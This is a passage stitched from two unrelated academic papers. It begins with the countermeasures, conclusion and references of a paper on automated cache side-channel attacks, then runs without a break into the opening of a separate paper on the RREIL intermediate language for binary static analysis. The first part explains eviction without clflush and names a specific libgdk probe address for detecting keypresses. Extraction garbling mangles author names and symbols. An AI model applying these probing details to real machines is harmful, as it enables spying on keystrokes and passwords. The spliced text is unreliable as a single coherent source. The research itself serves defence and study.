6.1 Discussion of Countermeasures
Removal of the clflush Instruction is not Effective.
The restriction of the clflush instruction has been sug-
gested as a possible countermeasure against cache at-
tacks in [55, 56, 59]. However, by adapting our spy tool
to evict the cache line without using the clflush in-
struction (Evict+Reload instead of Flush+Reload), we
demonstrate that this countermeasure is not effective at
all. Thereby, we show that cache attacks can be launched
successfully even without the clflush instruction.
Instead of using the clflush instruction, the eviction
is done by accessing physically congruent addresses in
a large array which is placed in large pages by the op-
erating system. In order to compute physically congru-
ent addresses we need to determine the lowest 18 bits of
the physical address to attack, which can then be used to
evict specific cache sets.
The actual mapping of virtual to physical addresses
can be retrieved from /proc/self/pagemap . Even if
12
such a mapping is not available, methods to find con-
gruent addresses have been developed—simultaneously
to this work—by Irazoqui et al. [21] by exploiting large
pages, Oren et al. [39] by exploiting timing differences
in JavaScript, and Liu et al. [33] by exploiting timing
differences in native code.
The removal of the clflush instruction has also been
discussed as a countermeasure to protect against DRAM
disturbance errors (denoted as rowhammer bug). These
disturbance errors have been studied by Kim et al. [28]
and, later on, exploited by Seaborn et al. [46] to gain ker-
nel privileges. Several researchers have already claimed
to be able to exploit the rowhammer bug without the
clflush instruction [14], This can be done by exploit-
ing the Sandy Bridge cache mapping function, which has
been reverse engineered by Hund et al. [19], to find con-
gruent addresses.
Our eviction strategy only uses the lowest 18 bits and
therefore, we need more than 12 accesses to evict a cache
line. With 48 accessed addresses, we measured an evic-
tion rate close to 100%. For performance reasons we
use write accesses, as the CPU does not have to wait
for data fetches from the physical memory. In contrast
to the clflush instruction, which takes only 41 cycles,
our eviction function takes 325 cycles. This is still fast
enough for most Flush+Reload attacks.
While clflush always evicts the cache line, our evic-
tion rate is only near 100%. Therefore, false positive
cache hits occur if the line has not been evicted. Us-
ing Flush+Reload, there is a rather low probability for a
memory access on the monitored address to happen ex-
actly between the Reload step and the point where the
clflush takes effect. This probability is much higher
in the case of Evict+Reload, as the eviction step takes 8
times longer than the clflush instruction.
We compare the accuracy of Evict+Reload to
Flush+Reload using previously found cache vulnerabil-
ities. For instance, as described in Section 5.1, probing
address 0x7c800 oflibgdk-3.so.0.1000.8 allows us
to detect keypresses on key n. The Flush+Reload spy
tool detects on average 98% of the keypresses on key n
with a 2% false positive rate (keypresses on other keys).
Using Evict+Reload, we still detect 90% of the key-
presses on key nwith a 5% false positive rate. This
clearly shows that the restriction of clflush is not suf-
ficient to prevent this type of cache attack.
Disable Cache-Line Sharing. One prerequisite of
Flush+Reload attacks is shared memory. In cloud sce-
narios, shared memory across virtual machine borders is
established through page deduplication. Page dedupli-
cation between virtual machines is commonly disabled
in order to prevent more coarse-grained attacks like fin-
gerprinting operating systems and files [41, 48] as wellas Flush+Reload. Still, as shown by Irazoqui et al. [21],
it is possible to use Prime+Probe as a fallback. How-
ever, attacking low-frequency events like keypresses be-
comes infeasible, because Prime+Probe is significantly
more susceptible to noise.
Flush+Reload can also be prevented on a system by
preventing cache-line sharing, i.e., by disabling shared
memory. Unfortunately, operating systems make heavy
use of shared memory, and without modifying the operat-
ing system it is not possible for a user program to prevent
its own memory from being shared with an attacker, even
in the case of static linkage as discussed in Section 2.2.
With operating-system modifications, it would be pos-
sible to disable shared memory in all cases where a vic-
tim program cannot prevent an attack, i.e., shared pro-
gram binaries, shared libraries, shared generated files
(for instance, locale-archive ). Furthermore, it would
be possible to provide a system call to user programs to
mark memory as “do-not-share.”
A hardware-based approach is to change cache tags.
Virtually tagged caches are either invalidated on context
switches or the virtual tag is combined with an address
space identifier. Therefore, shared memory is not shared
in the cache. Thus, Flush+Reload is not possible on vir-
tually tagged caches.
We emphasize that as long as shared cache lines are
available to an attacker, Flush+Reload or Evict+Reload
cannot be prevented completely.
Cache Set Associativity. Prime+Probe, Evict+Time
and Evict+Reload exploit set-associative caches. In all
three cases, it is necessary to fill all ways of a cache set,
either for eviction or for the detection of evicted cache
sets. Based on which cache set was reloaded (respec-
tively evicted), secret information is deduced. Fully as-
sociative caches have better security properties, as such
information deduction is not possible and cache eviction
can only be enforced by filling the whole cache. How-
ever, a timing attack would still be possible, e.g., due
to internal cache collisions [5] leading to different exe-
cution times. As fully associative caches are impractical
for larger caches, new cache architectures have been pro-
posed to provide similar security properties [30, 52, 53].
However, even fully associative caches only prevent at-
tacks which do not exploit cache-line sharing. Thus, a
combination of countermeasures is necessary to prevent
most types of cache attacks.
6.2 Proactive Prevention of Cache Attacks
Instrumenting cache attacks to detect co-residency [58]
with another virtual machine on the same physical ma-
chine, or even to detect cache attacks [59] and cache-
based side channels in general [11] has already been pro-
13
posed in the past. Moreover, Brumley and Hakala [7]
even suggested that developers should use their attack
technique to detect and eliminate cache vulnerabilities
in their programs. Inspired by these works, we present
defense mechanisms against cache attacks which can be
improved by using Cache Template Attacks.
Detect Cache Vulnerabilities as a Developer. Similar
to Brumley and Hakala [7], we propose the employment
of Cache Template Attacks to find cache-based vulner-
abilities automatically. Compared to [7], Cache Tem-
plate Attacks allow developers to detect potential cache
side channels for specifically chosen events automati-
cally, which can subsequently be fixed by the developer.
A developer only needs to select the targeted events (e.g.,
keystrokes, window switches, or encryptions) and to trig-
ger these events automatically during the profiling phase,
which significantly eases the evaluation of cache side
channels. Ultimately, our approach even allows devel-
opers to find such cache vulnerabilities in third party li-
braries.
Detect and Impede Ongoing Attacks as a User.
Zhang et al. [59] stated the possibility to detect cache
attacks by performing a cache attack on one of the vul-
nerable addresses or cache sets. We propose running a
Cache Template Attack as a system service to detect code
and data under attack. If Flush+Reload prevention is suf-
ficient, we simply disable page sharing for all pages with
cache lines under attack. Otherwise, we disable caching
for these pages as proposed by Aciic  ̧mez et al. [1] and,
thus, prevent all cache attacks. Only the performance for
critical code and data parts is reduced, as the cache is
only disabled for specific pages in virtual memory.
Furthermore, cache attacks can be impeded by per-
forming additional memory accesses, unrelated to the se-
cret information, or random cache flushes. Such obfus-
cation methods on the attacker’s measurements have al-
ready been proposed by Zhang et al. [60]. The idea of the
proposed obfuscation technique is to generate random
memory accesses, denoted as cache cleansing. How-
ever, it does not address the shared last-level cache. In
contrast, Cache Template Attacks can be used to iden-
tify possible cache-based information leaks and then to
specifically add noise to these specific locations by ac-
cessing or flushing the corresponding cache lines.
6.3 Enhancing the Prefetcher
During our experiments, we found that the prefetcher in-
fluences the cache activity of certain access patterns dur-
ing cache attacks, especially due to the spatial locality
of addresses, as also observed in other work [17, 40, 55].However, we want to discuss the prefetcher in more de-
tail as it is crucial for the success of a cache attack.
Although the profiling phase of Cache Template At-
tacks is not restricted by the prefetcher, the spy pro-
gram performing the exploitation phase might be unable
to probe all leaking addresses simultaneously. For in-
stance, we found 255 addresses leaking side-channel in-
formation about keypresses in the GDK library but we
were only able to probe 8 of them simultaneously in the
exploitation phase, because the prefetcher loads multi-
ple cache lines in advance and, thus, generates numerous
false positive cache hits.
According to the Intel 64 and IA-32 Architectures Op-
timization Reference Manual [20], the prefetcher loads
multiple memory addresses in advance if “two cache
misses occur in the last level cache” and the correspond-
ing memory accesses are within a specific range (the so-
called trigger distance). Depending on the CPU model
this range is either 256 or 512 bytes, but does not ex-
ceed a page boundary of 4 KB. Due to this, we are able
to probe at least 2 addresses per page.
We suggest increasing the trigger distance of the
prefetcher beyond the 4 KB page boundary if the corre-
sponding page already exists in the translation lookaside
buffer. The granularity of the attack will then be too high
for many practical targets, especially attacks on executed
instructions will then be prevented.
As cache attacks constantly reaccess specific memory
locations, another suggestion is to adapt the prefetcher
to take temporal spatiality into consideration. If the
prefetcher were to prefetch data based on that temporal
distance, most existing attacks would be prevented.
Just as we did in Section 4, an attacker might still be
able to establish a communication channel targeted to
circumvent the prefetcher. However, the presented coun-
termeasures would prevent most cache attacks targeting
real-world applications.
7 Conclusion
In this paper, we introduced Cache Template Attacks,
a novel technique to find and exploit cache-based side
channels easily. Although specific knowledge of the at-
tacked machine and executed programs or libraries helps,
it is not required for a successful attack. The attack is
performed on closed-source and open-source binaries in
exactly the same way.
We studied various applications of Cache Template
Attacks. Our results show that an attacker is able to in-
fer highly accurate keystroke timings on Linux as well as
Windows. For Linux distributions we even demonstrated
a fully automatic keylogger that significantly reduces the
entropy of passwords. Hence, we conclude that cache-
based side-channel attacks are an even greater threat for
14
today’s computer architectures than assumed so far. In
fact, even sensitive user input, like passwords, cannot be
considered secure on machines employing CPU caches.
We argue that fundamental concepts of computer ar-
chitectures and operating systems enable the automatic
exploitation of cache-based vulnerabilities. We observed
that many of the existing countermeasures do not pre-
vent such attacks as expected. Still, the combination of
multiple countermeasures can effectively mitigate cache
attacks. However, the fact that cache attacks can be
launched automatically marks a change of perspective,
from a more academic interest towards practical attacks,
which can be launched by less sophisticated attackers.
This shift emphasizes the need to develop and integrate
effective countermeasures immediately. In particular, it
is not sufficient to protect only specific cryptographic al-
gorithms like AES. More general countermeasures will
be necessary to counter the threat of automated cache at-
tacks.
8 Acknowledgments
We would like to thank the anonymous re-
viewers and our shepherd, Ben Ransford,
for their valuable comments and suggestions.
The research leading to these results
has received funding from the European
Union’s Horizon 2020 research and inno-
vation programme under grant agreement
No 644052 (HECTOR).
Furthermore, this work has been supported by the Aus-
trian Research Promotion Agency (FFG) and the Styrian
Business Promotion Agency (SFG) under grant number
836628 (SeCoS).
References
[1] A CIIC ̧MEZ, O., B RUMLEY , B. B., AND GRABHER , P. New
Results on Instruction Cache Attacks. In Cryptographic Hard-
ware and Embedded Systems – CHES (2010), vol. 6225 of LNCS ,
Springer, pp. 110–124.
[2] A CIIC ̧MEZ, O., AND KOC ̧ , C  ̧ . K. Trace-Driven Cache Attacks
on AES (Short Paper). In International Conference on Informa-
tion and Communications Security – ICICS (2006), vol. 4307 of
LNCS , Springer, pp. 112–121.
[3] B ENGER , N., VAN DE POL, J., S MART , N. P., AND YAROM , Y.
”Ooh Aah... Just a Little Bit” : A Small Amount of Side Channel
Can Go a Long Way. In Cryptographic Hardware and Embedded
Systems – CHES (2014), vol. 8731 of LNCS , Springer, pp. 75–92.
[4] B ERNSTEIN , D. J. Cache-Timing Attacks on AES, 2004. URL:
http://cr.yp.to/papers.html#cachetiming .
[5] B OGDANOV , A., E ISENBARTH , T., P AAR, C., AND WIENECKE ,
M. Differential Cache-Collision Timing Attacks on AES with
Applications to Embedded CPUs. In Topics in Cryptology – CT-
RSA (2010), vol. 5985 of LNCS , Springer, pp. 235–251.
[6] B ONNEAU , J., AND MIRONOV , I. Cache-Collision Timing At-
tacks Against AES. In Cryptographic Hardware and EmbeddedSystems – CHES (2006), vol. 4249 of LNCS , Springer, pp. 201–
215.
[7] B RUMLEY , B. B., AND HAKALA , R. M. Cache-Timing Tem-
plate Attacks. In Advances in Cryptology – ASIACRYPT (2009),
vol. 5912 of LNCS , Springer, pp. 667–684.
[8] C HARI , S., R AO, J. R., AND ROHATGI , P. Template Attacks.
InCryptographic Hardware and Embedded Systems – CHES
(2002), vol. 2523 of LNCS , Springer, pp. 13–28.
[9] C HEN, C., W ANG , T., K OU, Y., C HEN, X., AND LI, X. Im-
provement of Trace-Driven I-Cache Timing Attack on the RSA
Algorithm. Journal of Systems and Software 86 , 1 (2013), 100–
107.
[10] D AEMEN , J., AND RIJMEN , V. The Design of Rijndael: AES
– The Advanced Encryption Standard . Information Security and
Cryptography. Springer, 2002.
[11] D OYCHEV , G., F ELD, D., K  ̈OPF, B., M AUBORGNE , L., AND
REINEKE , J. CacheAudit: A Tool for the Static Analysis of
Cache Side Channels. In USENIX Security Symposium (2013),
USENIX Association, pp. 431–446.
[12] F RANZ , M. E unibus pluram: Massive-Scale Software Diver-
sity as a Defense Mechanism. In Workshop on New Security
Paradigms – NSPW (2010), ACM, pp. 7–16.
[13] G ALLAIS , J., K IZHVATOV , I., AND TUNSTALL , M. Improved
Trace-Driven Cache-Collision Attacks against Embedded AES
Implementations. IACR Cryptology ePrint Archive 2010/408 .
[14] G OOGLE GROUPS . Rowhammer without CLFLUSH, 2015.
URL: https://groups.google.com/forum/#!topic/
rowhammer-discuss/ojgTgLr4q_M .
[15] G RUSS , D., S PREITZER , R., AND MANGARD , S. Cache tem-
plate attacks: Automating attacks on inclusive last-level caches.
In24th USENIX Security Symposium (USENIX Security 15)
(Washington, D.C., Aug. 2015), USENIX Association.
[16] G UERON , S. White Paper: Intel Advanced Encryption Stan-
dard (AES) Instructions Set, 2010. URL: https://software.
intel.com/file/24917 .
[17] G ULLASCH , D., B ANGERTER , E., AND KRENN , S. Cache
Games – Bringing Access-Based Cache Attacks on AES to Prac-
tice. In IEEE Symposium on Security and Privacy – S&P (2011),
IEEE Computer Society, pp. 490–505.
[18] G  ̈ULMEZO  ̆GLU, B., I NCI, M. S., E ISENBARTH , T., AND
SUNAR , B. A Faster and More Realistic Flush+Reload Attack
on AES. In Constructive Side-Channel Analysis and Secure De-
sign – COSADE (2015), LNCS, Springer. In press.
[19] H UND , R., W ILLEMS , C., AND HOLZ, T. Practical Timing Side
Channel Attacks against Kernel Space ASLR. In IEEE Sympo-
sium on Security and Privacy – SP (2013), IEEE Computer Soci-
ety, pp. 191–205.
[20] I NTEL CORPORATION .IntelR⃝64 and IA-32 Architectures Opti-
mization Reference Manual . No. 248966-026. 2012.
[21] I RAZOQUI , G., E ISENBARTH , T., AND SUNAR , B. S$A: A
Shared Cache Attack that Works Across Cores and Defies VM
Sandboxing – and its Application to AES. In IEEE Symposium
on Security and Privacy – S&P (2015), IEEE Computer Society.
[22] I RAZOQUI , G., I NCI, M. S., E ISENBARTH , T., AND SUNAR , B.
Fine grain Cross-VM Attacks on Xen and VMware are possible!
IACR Cryptology ePrint Archive 2014/248 .
[23] I RAZOQUI , G., I NCI, M. S., E ISENBARTH , T., AND SUNAR , B.
Wait a Minute! A fast, Cross-VM Attack on AES. In Research
in Attacks, Intrusions and Defenses Symposium – RAID (2014),
vol. 8688 of LNCS , Springer, pp. 299–319.
15
[24] I RAZOQUI , G., I NCI, M. S., E ISENBARTH , T., AND SUNAR ,
B. Know Thy Neighbor: Crypto Library Detection in Cloud.
Privacy Enhancing Technologies 1 , 1 (2015), 25–40.
[25] I RAZOQUI , G., I NCI, M. S., E ISENBARTH , T., AND SUNAR , B.
Lucky 13 Strikes Back. In ACM ASIA CCS (2015), pp. 85–96.
[26] K  ̈ASPER , E., AND SCHWABE , P. Faster and Timing-Attack Re-
sistant AES-GCM. In Cryptographic Hardware and Embedded
Systems – CHES (2009), vol. 5747 of LNCS , Springer, pp. 1–17.
[27] K ELSEY , J., S CHNEIER , B., W AGNER , D., AND HALL, C. Side
Channel Cryptanalysis of Product Ciphers. Journal of Computer
Security 8 , 2/3 (2000), 141–158.
[28] K IM, Y., D ALY, R., K IM, J., F ALLIN , C., L EE, J., L EE, D.,
WILKERSON , C., L AI, K., AND MUTLU , O. Flipping Bits in
Memory Without Accessing Them: An Experimental Study of
DRAM Disturbance Errors. In ACM/IEEE International Sympo-
sium on Computer Architecture – ISCA (2014), IEEE Computer
Society, pp. 361–372.
[29] K OCHER , P. C. Timing Attacks on Implementations of Diffie-
Hellman, RSA, DSS, and Other Systems. In Advances in Cryp-
tology – CRYPTO (1996), vol. 1109 of LNCS , Springer, pp. 104–
113.
[30] K ONG , J., A CIIC ̧MEZ, O., S EIFERT , J., AND ZHOU , H. De-
constructing New Cache Designs for Thwarting Software Cache-
based Side Channel Attacks. In ACM Workshop on Computer
Security Architecture – CSAW (2008), pp. 25–34.
[31] K  ̈ONIGHOFER , R. A Fast and Cache-Timing Resistant Imple-
mentation of the AES. In Topics in Cryptology – CT-RSA (2008),
vol. 4964 of LNCS , Springer, pp. 187–202.
[32] L IU, F., AND LEE, R. B. Random Fill Cache Architecture. In
International Symposium on Microarchitecture – MICRO (2014),
IEEE, pp. 203–215.
[33] L IU, F., Y AROM , Y., G E, Q., H EISER , G., AND LEE, R. B.
Last-level cache side-channel attacks are practical. In IEEE Sym-
posium on Security and Privacy – S&P (2015).
[34] M AURICE , C., N EUMANN , C., H EEN, O., AND FRANCILLON ,
A. C5: Cross-Cores Cache Covert Channel. In DIMVA (2015).
In press.
[35] M OWERY , K., K EELVEEDHI , S., AND SHACHAM , H. Are AES
x86 Cache Timing Attacks Still Feasible? In Workshop on Cloud
Computing Security – CCSW (2012), ACM, pp. 19–24.
[36] N ATIONAL INSTITUTE OF STANDARDS AND TECHNOLOGY .
Advanced Encryption Standard. NIST FIPS PUB 197, 2001.
[37] N EVE, M. Cache-based Vulnerabilities and SPAM Analysis . PhD
thesis, UCL, 2006.
[38] O PENSSL S OFTWARE FOUNDATION . OpenSSL Project, 2014.
URL: http://www.openssl.org/ .
[39] O REN, Y., K EMERLIS , V. P., S ETHUMADHAVAN , S., AND
KEROMYTIS , A. D. The Spy in the Sandbox - Practical Cache
Attacks in Javascript. CoRR abs/1502.07373 (2015).
[40] O SVIK , D. A., S HAMIR , A., AND TROMER , E. Cache Attacks
and Countermeasures: The Case of AES. In Topics in Cryptology
– CT-RSA (2006), vol. 3860 of LNCS , Springer, pp. 1–20.
[41] O WENS , R., AND WANG , W. Non-Interactive OS Fingerprint-
ing Through Memory De-Duplication Technique in Virtual Ma-
chines. In International Performance Computing and Communi-
cations Conference – IPCCC (2011), IEEE, pp. 1–8.
[42] P AGE, D. Theoretical Use of Cache Memory as a Cryptanalytic
Side-Channel. IACR Cryptology ePrint Archive 2002/169 .
[43] P ERCIVAL , C. Cache Missing for Fun and Profit,
2005. URL: http://www.daemonology.net/
hyperthreading-considered-harmful/ .[44] R EBEIRO , C., S ELVAKUMAR , A. D., AND DEVI, A. S. L. Bit-
slice Implementation of AES. In Cryptology and Network Secu-
rity – CANS (2006), vol. 4301 of LNCS , Springer, pp. 203–212.
[45] R ISTENPART , T., T ROMER , E., S HACHAM , H., AND SAVAGE ,
S. Hey, You, Get Off of My Cloud: Exploring Information Leak-
age in Third-Party Compute Clouds. In ACM Conference on
Computer and Communications Security – CCS (2009), ACM,
pp. 199–212.
[46] S EABORN , M., AND DULLIEN , T. Exploiting the DRAM
Rowhammer Bug to Gain Kernel Privileges, 2015. URL:
http://googleprojectzero.blogspot.co.at/2015/03/
exploiting-dram-rowhammer-bug-to-gain.html .
[47] S PREITZER , R., AND PLOS, T. Cache-Access Pattern Attack on
Disaligned AES T-Tables. In Constructive Side-Channel Anal-
ysis and Secure Design – COSADE (2013), vol. 7864 of LNCS ,
Springer, pp. 200–214.
[48] S UZAKI , K., I IJIMA , K., Y AGI, T., AND ARTHO , C. Memory
Deduplication as a Threat to the Guest OS. In European Work-
shop on System Security – EUROSEC (2011), ACM, pp. 1–6.
[49] T ANNOUS , A., T ROSTLE , J. T., H ASSAN , M., M CLAUGHLIN ,
S. E., AND JAEGER , T. New Side Channels Targeted at Pass-
words. In Annual Computer Security Applications Conference –
ACSAC (2008), pp. 45–54.
[50] T ROMER , E., O SVIK , D. A., AND SHAMIR , A. Efficient Cache
Attacks on AES, and Countermeasures. Journal Cryptology 23 ,
1 (2010), 37–71.
[51] T SUNOO , Y., S AITO , T., S UZAKI , T., S HIGERI , M., AND
MIYAUCHI , H. Cryptanalysis of DES Implemented on Com-
puters with Cache. In Cryptographic Hardware and Embedded
Systems – CHES (2003), vol. 2779 of LNCS , Springer, pp. 62–76.
[52] W ANG , Z., AND LEE, R. B. New Cache Designs for Thwarting
Software Cache-based Side Channel Attacks. In International
Symposium on Computer Architecture – ISCA (2007), pp. 494–
505.
[53] W ANG , Z., AND LEE, R. B. A Novel Cache Architecture with
Enhanced Performance and Security. In IEEE/ACM International
Symposium on Microarchitecture – MICRO (2008), pp. 83–93.
[54] W EISS, M., H EINZ , B., AND STUMPF , F. A Cache Timing At-
tack on AES in Virtualization Environments. In Financial Cryp-
tography and Data Security – FC (2012), vol. 7397 of LNCS ,
Springer, pp. 314–328.
[55] Y AROM , Y., AND BENGER , N. Recovering OpenSSL ECDSA
Nonces Using the FLUSH+RELOAD Cache Side-channel At-
tack. IACR Cryptology ePrint Archive 2014/140 .
[56] Y AROM , Y., AND FALKNER , K. FLUSH+RELOAD: A High
Resolution, Low Noise, L3 Cache Side-Channel Attack. In
USENIX Security Symposium (2014), USENIX Association,
pp. 719–732.
[57] Z HANG , K., AND WANG , X. Peeping Tom in the Neighborhood:
Keystroke Eavesdropping on Multi-User Systems. In USENIX
Security Symposium (2009), USENIX Association, pp. 17–32.
[58] Z HANG , Y., J UELS , A., O PREA , A., AND REITER , M. K.
HomeAlone: Co-residency Detection in the Cloud via Side-
Channel Analysis. In IEEE Symposium on Security and Privacy
– S&P (2011), IEEE Computer Society, pp. 313–328.
[59] Z HANG , Y., J UELS , A., R EITER , M. K., AND RISTENPART ,
T. Cross-Tenant Side-Channel Attacks in PaaS Clouds. In ACM
Conference on Computer and Communications Security – CCS
(2014), ACM, pp. 990–1003.
[60] Z HANG , Y., AND REITER , M. K. D  ̈uppel: Retrofitting Com-
modity Operating Systems to Mitigate Cache Side Channels in
the Cloud. In ACM Conference on Computer and Communica-
tions Security – CCS (2013), ACM, pp. 827–838.
16Precise Static Analysis of Binaries by Extracting
Relational Information
Alexander Sepp Bogdan Mihaila Axel Simon
Lehrstuhl f  ̈ur Informatik 2, Technical University Munich, Germany
firstname.lastname@in.tum.de
Abstract —While the reconstruction of the control-flow graph of
a binary has received wide attention, the challenge of categorizing
code into defect-free and possibly incorrect remains a challenge
for current static analyses. We present the intermediate language
RREIL and a corresponding analysis framework that is able to
infer precise numeric information on variables without resorting
to an expensive analysis at the bit-level. Specifically, we propose
a hierarchy of three interfaces to abstract domains, namely
for inferring memory layout, bit-level information and numeric
information. Our framework can be easily enriched with new
abstract domains at each level. We demonstrate the extensibility
of our framework by detailing a novel acceleration technique
(a so-called widening) as an abstract domain that helps to find
precise fixpoints of loops.
I. I NTRODUCTION
Security auditing has traditionally been forced to consult
the program executables (the “binary”) rather than its source
code for finding vulnerabilities. The sheer size of today’s
software also leads to more complex systems with more de-
fects. Since the corresponding binaries lack any structure that
make a large project manageable, tool support is mandatory
to reverse engineer any real-world software. Current tools like
IDAPro help with the reconstruction of the control-flow graph
(CFG) but often require manual guidance when confronted
with optimized or obfuscated code, malware, etc., due to the
use of code patterns that can only capture a limited set of
compiler idioms. Recent approaches address this shortcoming
by inferring possible values of registers and memory locations
which helps to resolve most indirect jumps [1], [2], [3].
However, the reconstruction of the CFG is only a first step
to finding vulnerabilities. One way forward is the use of
a precise and sound static analysis that is able to identify
large parts of the code as correct so as to focus the security
engineer on potentially vulnerable code fragments. In this
paper, we address this concern by presenting a static analysis
that can infer precise information on memory regions and their
content, thereby helping to prove memory accesses correct.
One challenge is the inference of precise numeric information
to determine the possible pointer offset. It turns out that
many intermediate representations in the literature express
the semantics of native instructions at the bit-level [4], [5]
which often requires expensive SAT solving techniques to
infer numeric range information [6], [7]. We propose to re-use
static analysis techniques such as numeric abstract domains
(intervals [8], linear equations [9] and inequalities [10]) that
have been successfully applied to high-level languages [11].Employing numeric domains for binary analysis is chal-
lenging as assembler instructions operate on bit vectors whose
numeric value depends on whether the vector is interpreted as
signed or unsigned integer. In particular, certain instructions
such as add orshl have the same bit-level semantics regard-
less of whether their arguments are signed or unsigned. In con-
trast, a relational test a  btranslates into different assembler
instruction sequences, depending on the signedness of a; b.
We present an analysis framework that maps native assembler
into a small intermediate language (IL) called RREIL that is
carefully crafted to allow for an easy recovery of numeric
information, especially from relational tests and conversions
between differently sized integers. RREIL is then translated
into an IL on bit-vectors which is, in turn, translated into an
IL on variables over Z. An abstract domain that implements
an analysis thus implements an interface in form of one of
these ILs. For example, an interval domain implements the
IL over Zwhile a bit-level analysis based on SAT-solving
would implement the IL over bit vectors. We argue that this
hierarchical approach allows for both, efficiency and precision.
While the use of numeric domains is relatively cheap,
termination of fixpoint calculations relies on widening and
narrowing [12]. We argue that narrowing interacts badly with
the reconstruction of the CFG and show how to refine it.
Due to over-approximation, our analysis may warn about
invalid memory accesses that cannot occur in the actual
program; a so-called false positive. Our framework therefore
features a plug-in architecture in which auditors can integrate
special-purpose domains specific to their analysis needs.
In summary, this paper contributes the following:
the RREIL intermediate language that allows for a con-
cise translation of complex architectures (e.g. x86-64)
into precise numeric domain operations
a domain hierarchy that separates different concerns of
an analysis and which may be extended by the end user
through a plug-in architecture
a novel way to perform widening without undue loss of
precision that is particularly suitable for analyses where
the CFG is not known a priori
The paper is organized as follows. The next section details
the grammar and motivation of our RREIL intermediate lan-
guage. Section III describes the different domain types of our
analysis. Section IV details our novel widening for binaries
before Sect. V presents an evaluation. Finally, related work is
presented in Sect. VI before Sect. VII concludes.
II. D ESIGNING AN INTERMEDIATE LANGUAGE FOR
RELATIONAL ANALYSIS
Mobile devices and other specialized architectures like
PLCs are increasingly used in security critical contexts. Au-
tomatic analysis of these diverse systems requires tools to
abstract from the instruction set of each individual architecture
by using an intermediate language (IL) since simulating the
semantic effect of each instruction of each platform becomes
infeasible. In fact, even when targeting a single platform such
as Intel x86, the semantic effects of over 600 instructions
would have to be simulated. However, each x86 instruction
usually assembles several distinct effects similar to a macro.
Not unlike the decomposition into micro-ops within the pro-
cessor, each instruction is translated into a small intermediate
language (IL) with simple semantics. The next sections moti-
vate the design of a new intermediate language called RREIL.
A. Translation of Comparisons
One goal in the design of such intermediate languages has
been to minimize the number of instructions of the IL required
to represent all native instruction [4], [5]. A small IL promises
a simple analysis, however, small ILs often require clever bit-
shifting and bit-masking operations to model a native instruc-
tion. Consider the following translation of the x86 compare
instruction cmp eax, ebx followed by a conditional jump
jl(jump if less) into the REIL intermediate language [5]
which was the starting point for our RREIL language:
00: and t0: 3 2, 2147483648 : 3 2, eax : 3 2
01: and t1: 3 2, 2147483648 : 3 2, ebx : 3 2
02: sub t2: 6 4, ebx : 3 2, eax : 3 2
03: and t3: 3 2, 2147483648 : 3 2, t2 : 6 4
04: bsh SF: 8, -31 : 3 2, t3 : 3 2
05: xor t4: 3 2, t1 : 3 2, t0 : 3 2
06: xor t5: 3 2, t3 : 3 2, t0 : 3 2
07: and t6: 3 2, t5 : 3 2, t4 : 3 2
08: bsh OF: 8, -31 : 3 2, t6 : 3 2
09: and t7: 6 4, 4294967296 : 6 4, t2 : 6 4
0A: bsh CF: 8, -32 : 3 2, t7 : 6 4
0B: and t8: 3 2, 4294967295 : 6 4, t2 : 6 4
0C: bisz ZF: 8, t8 : 3 2
0D: xor t9: 8, OF : 8, SF : 8
0E: jcc t9: 8, signed_less : 3 2
This translation converts the compare instruction into
a subtraction sub that stores its intermediate result
in the temporary register t 2. Various bit operations
then calculate the sign flag S F = t 2 [31], overflow flag
O F = ( eax [31]  ebx [31]) ^ t 2 [31], carry flag C F = t 2 [32],
and zero flag Z F = : ( t 2 [0] ^ : : : ^ t 2 [31]) . Here, bsh is a
bit shift and bisz corresponds to the not operator !of C.
Suppose that the intention was to test if eax < ebx where
eax and ebxhold signed integers. In this case the subsequent
instruction is a conditional jump testing if S F  O F is one.
This translation is at odds with the need of common static
analyses that infer numeric information on program variables.These analyses require explicit relational tests to infer precise
bounds on program values that are required to find, for
instance, buffer overflows. The bit-level semantics render
the extraction of these relational tests difficult: recovering
the semantics eax < ebx of the tests requires the analysis
to recover the arithmetic semantics implemented by cmp
by tracing the bit-level calculation of the flags. The implicit
assumption of using bit-level semantics in intermediate
languages seems to be that SAT solving is to be used to
reason about the values of variables. However, using SAT
solving to perform a reachability analysis (in contrast to
inferring single traces) faces scalability problems as soon
as non-trivial loops are analyzed. Even when combining
SAT solving with abstraction to numeric ranges [6], the
resulting analyses only perform well on embedded code
where registers are 8 bit wide. Thus, our aim is to obtain
a scalable analysis by applying the arithmetic semantics
implemented by cmp directly on some numeric abstract
domain. One way forward would be to pattern match the REIL
instruction sequences that implement cmp r1,r2; jl,
cmp r1,r2; jg, etc. However, this approach is
architecture-specific as each instruction set is translated
differently. Furthermore, it fails if an optimizing compiler
inserts instructions between the test and the jump or if
malicious code is considered.
We therefore propose a new variant of REIL [5] called
RREIL (Relational Reverse Engineering Intermediate Lan-
guage) in which flag calculations are translated into arithmetic
instructions if possible. For instance, cmp eax, ebx fol-
lowed by jltranslates into RREIL as follows:
00: sub t0: 3 2, eax : 3 2, ebx : 3 2
01: cmpltu CF: 1, eax : 3 2, ebx : 3 2
02: cmpleu CForZF : 1, eax : 3 2, ebx : 3 2
03: cmplts SFxorOF : 1, eax : 3 2, ebx : 3 2
04: cmples SFxorOForZF : 1, eax : 3 2, ebx : 3 2
05: cmpeq ZF: 1, eax : 3 2, ebx : 3 2
06: cmplts SF: 1, t0 : 3 2, 0 : 3 2
07: xor OF: 1, SFxorOF : 1, SF : 1
08: brc SFxorOF : 1, signed_less : 3 2
The comparisons in lines 1 to 6 test for, <; of unsigned
values, <; for signed values, equality and if the result
is negative, respectively. The translation creates what we
call virtual flags, that is, flags that are not present in the
processor but which express relational information that can
be conveyed to numeric domains. For instance, S F xor O F is
set iff eax < ebx when eax and ebxare interpreted as signed
integers. The force of this approach is that each arithmetic
test is associated with one flag and, once the conditional
branch is reached, the test matching the flag can be applied to
the numeric abstract domain. Observe that the overflow flag
O F carries no meaningful arithmetic information but is still
calculated to allow bit-level analyses such as SAT solving.
Note that the unsatisfactory translation of relational tests
into REIL is only one reason for our new IL RREIL. Two
2
8 7 6 5 4 3 2 1 0LSB MSB
rax
eax
ax
ah al
Figure 1. The possible fields of register rax.
other differences, namely that non-Boolean arguments to an
instruction sub,cmpltu , etc., must have the same size and
may be accessed at an offset, implies that our analysis cannot
analyze REIL code. Thus, RREIL is not an extension of REIL;
rather, it is a new IL whose features are carefully chosen to
allow for a precise numeric analysis of the resulting RREIL
code, as detailed in the following sections.
B. Fields in Registers
A thorough understanding of a binary requires the recovery
of memory layout, that is, the location and sizes of variables
on the stack, heap and global memory. Indeed, many analyses
incorporate some sort of memory layout inference [13]. The
idea is to identify sequences of bytes that are modelled by a
